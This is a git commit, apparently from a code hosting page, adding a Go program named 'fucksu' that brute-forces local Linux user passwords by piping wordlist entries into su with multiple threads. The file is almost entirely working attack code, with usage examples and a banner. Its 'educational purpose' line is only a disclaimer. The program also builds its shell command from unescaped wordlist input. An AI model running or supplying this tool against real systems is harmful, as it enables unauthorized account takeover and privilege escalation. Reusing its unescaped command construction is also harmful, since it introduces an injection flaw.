First commit

2023-02-01 10:27:47 +01:00 · 2023-02-01 10:27:47 +01:00 · 0754ac06a5
commit 0754ac06a5
parent 61bfb66950
5 changed files with 123 additions and 0 deletions
--- a/README.md
+++ b/README.md
--- a/BIN
+++ b/BIN
--- a/fucksu.go
+++ b/fucksu.go
@ -0,0 +1,116 @@
 /*
 Description: Tool to bruteforce local users through su using a dictionary.
 Auth0r: sml@lacashita.com
 Use it only as educational purpose.
 */
 package main
 import (
 	"bufio"
 	"flag"
 	"fmt"
 	"github.com/go-cmd/cmd"
 	"os"
 	"sync"
 	"os/user"
 )
 func prepareWordlist(jobs chan string, wordlist *string) {
 	file, _ := os.Open(*wordlist)
 	scanner := bufio.NewScanner(file)
 	for scanner.Scan() {
 		jobs <- scanner.Text()
 	}
 	close(jobs)
 }
 func fuckSU(jobs chan string, wg *sync.WaitGroup, uzer string){
 	defer wg.Done()
 	for {
 		pazz, ok := <-jobs
 		if !ok {
 			break
 		} else {
 			var lacasito string
 			lacasito = fmt.Sprintf("echo \"%v\" | timeout 0.1 su %v -c id",pazz,uzer)
 			c := cmd.NewCmd("bash", "-c", lacasito)
 			<-c.Start()
 			if len(c.Status().Stdout) != 0 {
 				fmt.Printf("[+] Pass found: %v\n",pazz)
 				os.Exit(0)
 			}
 		}
 	}
 }
 func checkWordlist(keyfile *string) {
 	var file string
 	file = *keyfile
 	_, err := os.Stat(file)
 	if err != nil {
 		fmt.Println("[!] Wordlist doesnt exist")
 		os.Exit(1)
 	}
 }
 func checkUser(uzer string) {
    _, err := user.Lookup(uzer)
    if err != nil {
 	fmt.Println("[!] User doesnt exists.")
 	os.Exit(1)
    }
 }
 func menu(options int) {
 	if options < 4 {
 		fmt.Println(`
 [!] Insufficient Arguments
 Examples of usage:
 fucksu -u loco -w rockyou.txt 
 Example with 5 threads:
 fucksu -u loco -w rockyou.txt -t 5
 		`)
 		os.Exit(1)
 	}
 }
 func main() {
 	var wordlist string
 	var uzer string
 	var threads int
 	var wg sync.WaitGroup
 	jobs := make(chan string)
 	flag.StringVar(&wordlist, "w", "", "Like /usr/share/wordlists/rockyou.txt")
    flag.StringVar(&uzer, "u", "", "Username")
 	flag.IntVar(&threads, "t", 5, "Threads, by default 5")
 	flag.Parse()
 	menu(len(os.Args))
 	checkWordlist(&wordlist)
 	checkUser(uzer)
 	fmt.Printf(`
  ______          _     _____ _    _ 
 |  ____|        | |   / ____| |  | |
 | |__ _   _  ___| | _| (___ | |  | |
 |  __| | | |/ __| |/ /\___ \| |  | |
 | |  | |_| | (__|   < ____) | |__| |
 |_|   \__,_|\___|_|\_\_____/ \____/ 
 [-] Bruteforcing su.... Wait.
 `)
 	go prepareWordlist(jobs, &wordlist)
 	for i := 0; i < threads; i++ {
 		go fuckSU(jobs, &wg, uzer)
 		wg.Add(1)
 	}
 	wg.Wait()
 	fmt.Printf("[x] Password not found :_(\n")
 }
--- a/go.mod
+++ b/go.mod
@ -0,0 +1,5 @@
 module sucrack
 go 1.19
 require github.com/go-cmd/cmd v1.4.1 // indirect
--- a/go.sum
+++ b/go.sum
@ -0,0 +1,2 @@
 github.com/go-cmd/cmd v1.4.1 h1:JUcEIE84v8DSy02XTZpUDeGKExk2oW3DA10hTjbQwmc=
 github.com/go-cmd/cmd v1.4.1/go.mod h1:tbBenttXtZU4c5djS1o7PWL5pd2xAr5sIqH1kGdNiRc=
		`@ -0,0 +1,2 @@`
							`github.com/go-cmd/cmd v1.4.1 h1:JUcEIE84v8DSy02XTZpUDeGKExk2oW3DA10hTjbQwmc=`
							`github.com/go-cmd/cmd v1.4.1/go.mod h1:tbBenttXtZU4c5djS1o7PWL5pd2xAr5sIqH1kGdNiRc=`